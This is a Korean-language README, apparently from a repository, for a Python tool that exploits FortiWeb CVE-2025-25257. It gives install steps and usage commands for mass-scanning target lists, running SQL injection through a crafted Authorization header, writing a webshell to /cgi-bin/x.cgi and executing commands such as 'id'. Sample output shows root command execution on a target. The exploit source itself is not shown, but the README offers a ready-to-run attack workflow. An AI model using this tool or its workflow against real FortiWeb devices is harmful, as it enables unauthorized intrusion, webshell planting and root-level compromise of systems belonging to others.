
Python 기반의 FortiWeb CVE-2025-25257 익스플로잇 도구. 취약한 대상에 대해 SQL 인젝션 탐지, 웹쉘 업로드, 원격 명령 실행을 자동화합니다.
FortiWeb 장치에서 CVE-2025-25257 취약점을 확인하고 익스플로잇하기 위한 Python 기반 도구입니다. 이 취약점은 조작된 Authorization 헤더를 통해 SQL 인젝션 및 원격 코드 실행을 허용합니다.
CVE-2025-25257은 FortiWeb 장치의 심각한 취약점으로, 다음을 허용합니다:
pip install requests urllib3
git clone https://github.com/yourusername/CVE-2025-25257.git
cd CVE-2025-25257
pip install -r requirements.txt
vuln_check.py)단일 대상 확인:
python3 vuln_check.py -t https://target.com
파일에서 여러 대상 확인:
python3 vuln_check.py -l target.txt
exp.py)취약한 대상에서 명령 실행:
python3 exp.py -t https://target.com -c "id"
vuln_check.py - 주요 취약점 검사기 및 익스플로잇exp.py - 취약한 대상용 명령 실행 도구target.txt - 대상 샘플 목록 (직접 교체하세요)vuln.txt - 취약한 대상이 포함된 출력 파일 (스캔 후 생성)/api/fabric/device/status를 익스플로잇합니다./cgi-bin/x.cgi에 웹쉘을 작성합니다.이 도구는 다음을 포함하는 vuln.txt 파일을 생성합니다:
예시 출력:
# CVE-2025-25257 Vulnerable Targets - 2025-01-27 10:30:15
# Format: [timestamp] target - command_output
[2025-01-27 10:30:15] https://target.com - uid=0(root) gid=0(root) groups=0(root)
크레딧:0xbigshaq